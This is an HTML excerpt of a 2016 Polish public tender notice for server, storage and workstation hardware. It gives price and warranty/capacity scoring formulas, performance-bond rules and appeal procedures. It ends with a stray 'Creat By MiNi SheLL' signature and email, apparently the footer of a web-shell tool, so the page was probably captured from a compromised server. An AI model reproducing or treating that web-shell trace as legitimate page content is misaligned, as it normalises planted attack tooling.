              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">15.	OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW 
I SPOSOBU OCENY OFERT. 

1.	Do wyboru najkorzystniejszej oferty Zamawiający posługiwał się będzie kryteriami cenowymi, kryterium terminu dostawy i kryteriami jakościowymi.
2.	Zostanie wybrana oferta, która uzyska największą liczbę punktów, przy czym:

Kryteria oceny ofert 	Waga (%)
Cena oferty	maksymalnie 60 %

Kryteria jakościowe 	maksymalnie 40% 
(2% + 4% + 10% + 7% 
+ 10% + 7%)

a)	Kryterium cenowe:
1) Oferowana cena  maksymalnie 60 punktów.
W powyższym kryterium oceniana będzie łączna cena brutto oferty. Maksymalną ilość punktów otrzyma wykonawca, który zaproponuje najniższą cenę, pozostali będą oceniani wg następującego wzoru: 
					          Cena brutto oferty najniższej
            Liczba punktów za kryterium cenowe LPc = ----------------------------------------------------  x 60 pkt
					            Cena brutto oferty badanej
2) Każdy wykonawca będzie oceniany w ww. kryterium w skali od 0 do 60 punktów.
3) Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić  zgodnie z obowiązującymi przepisami.
4)   Zamawiający nie dopuszcza rozliczeń w walutach obcych. Rozliczenia mogą być prowadzone tylko w walucie polskiej PLN.

b)	Kryteria jakościowe: 

1)	Kryterium jakościowym jest:

a) Pamięć RAM - Dodatkowy czas gwarancji 

W powyższym kryterium oceniany będzie dodatkowy czas gwarancji powyżej 36 miesięcy (Zgodnie z wymogiem minimalnie 36 miesięcy, którą Wykonawca określa w załączniku nr 3 do SIWZ stanowiącego element przedłożonej oferty)

	Punkty liczone będą w następujący sposób:

         					          Czas gwarancji w ofercie badanej (w miesiącach) - 36
            Liczba punktów za kryterium jakościowe LPKjI =  ----------------------------------------------------                         x 2 pkt.
					                                          60 - 36

UWAGA!!!
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę czasu gwarancji pamięci RAM dłuższej niż 60 miesięcy, Zamawiający przyjmie do obliczeń w kryterium oceny ofert Kryterium jakościowe długość 60 miesięcy, natomiast wydajność wskazana przez Wykonawcę będzie wiążąca do realizacji przez Niego zamówienia.
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę czasu gwarancji pamięci RAM krótszej niż 36 miesięcy, oferta będzie odrzucona, jako niezgodna z SIWZ.
Zaoferowanie kryterium jakościowego niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.

	Każdy wykonawca będzie oceniany w powyższym kryterium w skali od 0 do 2 punktów


b) Dyski macierzy - Dodatkowa pojemność dysku 

W powyższym kryterium oceniana będzie dodatkowa pojemność dysku powyżej 6 TB (Zgodnie z wymogiem minimalnie 6 TB, którą Wykonawca określa w załączniku nr 3 do SIWZ stanowiącego element przedłożonej oferty)

	Punkty liczone będą w następujący sposób:

         					           Pojemność dysku w ofercie badanej (TB)  -   6
            Liczba punktów za kryterium jakościowe LPKjII =  ----------------------------------------------------  x 4 pkt
					                                                 8 - 6

UWAGA!!!
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę dodatkowej pojemności dysku wyższej niż 8 TB, Zamawiający przyjmie do obliczeń w kryterium oceny ofert Kryterium jakościowe pojemność dysku równą 8 TB, natomiast wydajność wskazana przez Wykonawcę będzie wiążąca do realizacji przez Niego zamówienia.
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę dodatkowej pojemności dysku niższej niż 6 TB, oferta będzie odrzucona, jako niezgodna z SIWZ.
Zaoferowanie kryterium jakościowego niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.

	Każdy wykonawca będzie oceniany w powyższym kryterium w skali od 0 do 4 punktów


c) Serwer - Dodatkowy czas gwarancji 

W powyższym kryterium oceniany będzie dodatkowy czas gwarancji powyżej 36 miesięcy (Zgodnie z wymogiem minimalnie 36 miesięcy, którą Wykonawca określa w załączniku nr 3 do SIWZ stanowiącego element przedłożonej oferty)

	Punkty liczone będą w następujący sposób:

         					          Czas gwarancji w ofercie badanej (w miesiącach)  - 36
            Liczba punktów za kryterium jakościowe LPKjIII =  ----------------------------------------------------                     x 10 pkt.
					                                          60 - 36

UWAGA!!!
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę czasu gwarancji serwera dłuższej niż 60 miesięcy, Zamawiający przyjmie do obliczeń w kryterium oceny ofert Kryterium jakościowe długość 60 miesięcy, natomiast wydajność wskazana przez Wykonawcę będzie wiążąca do realizacji przez Niego zamówienia.
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę czasu gwarancji serwera krótszej niż 36 miesięcy, oferta będzie odrzucona, jako niezgodna z SIWZ.
Zaoferowanie kryterium jakościowego niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.

	Każdy wykonawca będzie oceniany w powyższym kryterium w skali od 0 do 10 punktów

d) Serwer - Dodatkowa pojemność pamięci RAM

W powyższym kryterium oceniana będzie dodatkowa pojemność pamięci RAM powyżej 
64 GB (Zgodnie z wymogiem minimalnie 64 GB, którą Wykonawca określa w załączniku nr 3 do SIWZ stanowiącego element przedłożonej oferty)

	Punkty liczone będą w następujący sposób:

         					            Pojemność pamięci RAM w ofercie badanej (GB)  - 64
            Liczba punktów za kryterium jakościowe LPKjIV =  ---------------------------------------------------------------------- x 7 pkt
					                                               128 - 64


UWAGA!!!
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę dodatkowej pamięci RAM serwera większej niż 128 GB, Zamawiający przyjmie do obliczeń w kryterium oceny ofert Kryterium jakościowe pamięć RAM równą 128 GB, natomiast wydajność wskazana przez Wykonawcę będzie wiążąca do realizacji przez Niego zamówienia.
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę dodatkowej pamięci RAM serwera mniejszej niż 64 GB, oferta będzie odrzucona, jako niezgodna z SIWZ.
Zaoferowanie kryterium jakościowego niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.

	Każdy wykonawca będzie oceniany w powyższym kryterium w skali od 0 do 7 punktów

e) Stacja robocza - Dodatkowy czas gwarancji 

W powyższym kryterium oceniany będzie dodatkowy czas gwarancji powyżej 36 miesięcy (Zgodnie z wymogiem minimalnie 36 miesięcy, którą Wykonawca określa w załączniku nr 3 do SIWZ stanowiącego element przedłożonej oferty)

	Punkty liczone będą w następujący sposób:

         					             Czas gwarancji w ofercie badanej (w miesiącach)- 36
            Liczba punktów za kryterium jakościowe LPKjV =  --------------------------------------------------------------------  x 10 pkt.
					                                                  60 - 36

UWAGA!!!
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę czasu gwarancji stacji roboczej dłuższej niż 60 miesięcy, Zamawiający przyjmie do obliczeń w kryterium oceny ofert Kryterium jakościowe długość 60 miesięcy, natomiast wydajność wskazana przez Wykonawcę będzie wiążąca do realizacji przez Niego zamówienia.
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę czasu gwarancji stacji roboczej krótszej niż 36 miesięcy, oferta będzie odrzucona, jako niezgodna z SIWZ.
Zaoferowanie kryterium jakościowego niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.

	Każdy wykonawca będzie oceniany w powyższym kryterium w skali od 0 do 10 punktów

f) Stacja robocza - Dodatkowa pojemność pamięci RAM

W powyższym kryterium oceniana będzie dodatkowa pojemność pamięci RAM powyżej 
256 GB (Zgodnie z wymogiem minimalnie 256 GB, którą Wykonawca określa w załączniku nr 3 do SIWZ stanowiącego element przedłożonej oferty)

	Punkty liczone będą w następujący sposób:

         					           Pojemność pamięci RAM w ofercie badanej (GB)- 256
            Liczba punktów za kryterium jakościowe LPKjVI =    -----------------------------------------------------------------            x 7 pkt
					                                                  512 - 256
UWAGA!!!
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę dodatkowej pamięci RAM stacji roboczej większej niż 512 GB, Zamawiający przyjmie do obliczeń 
w kryterium oceny ofert Kryterium jakościowe pamięć RAM stacji roboczej równą 512 GB, natomiast wydajność wskazana przez Wykonawcę będzie wiążąca do realizacji przez Niego zamówienia.
Zamawiający informuje, że w przypadku zaoferowania przez Wykonawcę dodatkowej pamięci RAM stacji roboczej mniejszej niż 256 GB, oferta będzie odrzucona, jako niezgodna z SIWZ.
Zaoferowanie kryterium jakościowego niezgodnego z wytycznymi Zamawiającego będzie skutkować odrzuceniem oferty zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodnej z treścią SIWZ.

	Każdy wykonawca będzie oceniany w powyższym kryterium w skali od 0 do 7 punktów

3.	Łączna liczba punktów za kryterium cenowe, termin dostawy oraz kryterium jakościowe liczona będzie wzorem: 
 
LP = LPc + LPkjI + LPkjII LPkjIII + LPkjIV LPkjV + LPkjVI
gdzie:
LP		to liczba punktów
LPc  		to kryterium cenowe
LPkjI		to kryterium jakościowe gwarancja pamięci RAM
LPkjII		to kryterium jakościowe  pojemność dysku macierzy
LPkjIII		to kryterium jakościowe gwarancja serwera
LPkjIV		to kryterium jakościowe pojemność pamięci RAM serwera
LPkjV		to kryterium jakościowe gwarancja stacji roboczej
LPkjVI		to kryterium jakościowe pojemność pamięci RAM stacji roboczej


4.	Punkty za kryteria: cena oferty, termin dostawy i kryteria jakościowe zostaną zsumowane.
5.	Każdy wykonawca będzie oceniany w skali od 0 do 100 punktów.
6.	Jeden punkt odpowiada 1%.
7.	Liczba punktów zostanie zaokrąglona do 2 miejsc po przecinku.
8.	Zamawiający udzieli zamówienia wykonawcy, którego oferta uzyska największą liczbę punktów łącznych.
9.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić  zgodnie z obowiązującymi przepisami.
10.	Zamawiający zgodnie z art. 24 aa ustawy pzp może najpierw dokonać oceny ofert, 
a następnie zbadać, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.
11.	Jeżeli Wykonawca, o którym mowa w ust. 9, uchyla się od zawarcia umowy, Zamawiający może zbadać, czy nie podlega wykluczeniu oraz czy spełnia warunki udziału 
w postępowaniu Wykonawca, który złożył ofertę najwyżej ocenioną spośród pozostałych ofert. Punkty zostaną przyznane na podstawie informacji uzyskanych z formularza ofertowego stanowiącego Załącznik nr 1 do SIWZ.
</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 31/10/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />16.	INFORMACJA O FORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO WYBORZE OFERTY W CELU ZAWARCIA UMOWY 
W SPRAWIE ZAMÓWIENIA PUBLICZNEGO.

1)	Informacje o formalnościach, jakie powinny być spełnione w celu zawarcia umowy:
1.	O wyborze najkorzystniejszej oferty Zamawiający informuje w trybie 
art. 92 ust. 1 niezwłocznie wszystkich Wykonawców, którzy złożyli ofertę.
2.	Informacje o wyborze najkorzystniejszej oferty Zamawiający zamieszcza również na swojej stronie internetowej, zgodnie z art. 92 ust. 2 ustawy
3.	Jeżeli jako najkorzystniejsza zostanie wybrana oferta Wykonawców  Konsorcjum/Spółki cywilnej, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Umowa regulująca współpracę tych podmiotów powinna zawierać: określenie celu gospodarczego, oświadczenia podmiotów o przyjęciu odpowiedzialności solidarnej, wskazanie podmiotu, któremu powierza się prowadzenie spraw i reprezentację na zewnątrz (lidera), oznaczenie czasu trwania umowy  wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia. Umowa regulująca współpracę musi być podpisana tak, by zobowiązywała prawnie wszystkie podmioty gospodarcze oraz musi stwierdzać solidarną odpowiedzialność partnerów wobec Zamawiającego za wykonanie umowy. 
4.	Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego, Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzenia ich ponownego badania i oceny, chyba, że zachodzą przesłanki unieważnienia postępowania, 
o których mowa w art. 93 ust. 1 ustawy.
5.	Przed podpisaniem umowy Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza na wezwanie Zamawiającego przedstawi szczegółową kalkulację ceny uwzględniającą kwotę netto oraz brutto na każdy asortyment przedmiotu zamówienia (wartość brutto musi być identyczna z wartością podaną na formularzu ofertowym) zgodnie z § 5 Wzoru umowy, stanowiącym Załącznik 
nr 7 do SIWZ. 
6.	Zamawiający będzie zawierał stosowne umowy o realizację zamówienia publicznego z wybranym wykonawcą.
7.	Wykonawca ma obowiązek zawrzeć umowę zgodnie ze wzorem umowy stanowiącym załącznik nr  7 do niniejszej SIWZ. 
8.	Zawarta umowa będzie jawna i będzie podlegała udostępnianiu na zasadach określonych w przepisach o dostępie do informacji publicznej (art. 139 ust. 3 ustawy).
2)	Termin i miejsce zawarcia umowy.
1.	Zamawiający zawrze umowę w sprawie zamówienia publicznego, 
z zastrzeżeniem art. 183 ustawy, w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli  zawiadomienie  to  zostało  przesłane przy  użyciu  środków  komunikacji elektronicznej,  albo 10  dni - jeżeli  zostało  przesłane  w  inny  sposób -  
w  przypadku zamówień, których wartość jest mniejsza niż kwoty określone 
w przepisach wydanych na podstawie art. 11 ust. 8.
2.	Umowa zostanie zawarta w siedzibie Zamawiającego, przed upływem terminu związania ofertą


17.	WYMAGANIA DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY.
1)	Wykonawca, którego oferta została uznana za najkorzystniejszą zobowiązany jest 
do wniesienia zabezpieczenia należytego wykonania umowy, zgodnie z art. 147  - 150 ustawy  w wysokości: 
6 % ceny  całkowitej podanej w ofercie,
2)	Zabezpieczenie należytego wykonania umowy będzie służyło do pokrycia roszczeń 
z tytułu niewykonania lub nienależytego wykonania umowy oraz roszczeń z tytułu rękojmi za wady. 
3)	Zabezpieczenie należytego wykonania umowy może być wniesione w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
4)	Jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione w pieniądzu zamawiający przechowa je na oprocentowanym rachunku bankowym. 
5)	Jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy. 
6)	Zabezpieczenie może być wniesione w jednej lub kilku formach. 
7)	W przypadku, gdy wykonawca wnosi zabezpieczenie w formie gwarancji bankowej 
lub gwarancji ubezpieczeniowej, z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
a) zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty do wysokości określonej w gwarancji kwoty, nieodwołalnie i bezwarunkowo, na pierwsze żądanie zamawiającego zawierające oświadczenie, że zaistniały okoliczności związane 
z niewykonaniem lub nienależytym wykonaniem umowy albo niewykonaniem 
lub nienależytym wykonaniem obowiązków wynikających z rękojmi.
b) termin obowiązywania gwarancji, 
8)	Wykonawca może w trakcie realizacji umowy dokonać zmiany formy wniesionego zabezpieczenia pod warunkiem zachowania ciągłości zabezpieczenia i nie zmniejszenia jego wysokości.

18.	ISTOTNE DLA STRON POSTANOWIENIA, KTÓRE ZOSTANĄ WPROWADZONE DO TREŚCI ZAWIERANEJ UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO:

1)	Wzór umowy stanowi załącznik nr 7, który stanowi integralną część SIWZ, w której Zamawiający przewidział wszystkie istotne dla stron postanowienia oraz przyszłe zobowiązania Wykonawcy i Zamawiającego.
2)	Umowa/y zostanie/ą zawarta/e z uwzględnieniem postanowień wynikających z treści SIWZ oraz danych zawartych w ofercie.

19.	POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA :

1.	Wykonawcy a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy, przysługują odpowiednio środki ochrony prawnej, 
o których mowa w dziale VI ustawy.
2.	Odwołanie na podstawie art. 180 ust. 2 przysługuje wyłącznie wobec czynności:
1)	wyboru trybu negocjacji bez ogłoszenia, zamówienia z wolnej ręki lub zapytania 
o cenę;
2)	określenia warunków udziału w postępowaniu;
3)	wykluczenia odwołującego z postępowania o udzielenie zamówienia;
4)	odrzucenia oferty odwołującego;
5)	opisu przedmiotu zamówienia;
6)	wyboru najkorzystniejszej oferty;

3.   Zgodnie z art. 182 ust. 1 pkt 2) ustawy odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia  jeżeli zostały przesłane w sposób określony w art. 180 ust. 5 ustawy, albo w terminie 10 dni  jeżeli zostały przesłane w inny sposób. Odwołanie wnosi się do Prezesa Izby (art. 180 ust. 4 ustawy).

4.   Na podstawie art. 181 ust. 1 ustawy Wykonawca może poinformować Zamawiającego 
w terminie przewidzianym do wniesienia odwołania o niezgodnej z przepisami ustawy czynności podjętej przez niego lub zaniechaniu czynności, do której jest on zobowiązany na podstawie ustawy, na które nie przysługuje odwołanie na podstawie art. 180 ust. 2 ustawy.

5.   Skarga do sądu  zgodnie z art. 198a ust. 1 na orzeczenie Krajowej Izby Odwoławczej stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu. Skargę wnosi się do sądu okręgowego właściwego dla siedziby albo miejsca zamieszkania Zamawiającego (art. 198b ust. 1 ustawy). Skargę wnosi się 
za pośrednictwem Prezesa Izby w terminie 7 dni od dnia doręczenia orzeczenia Izby (art. 198b ust. 2 ustawy).
6.    Zasady i tryb postępowania w zakresie korzystania ze środków ochrony prawnej określone zostały w dziale VI ustawy.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com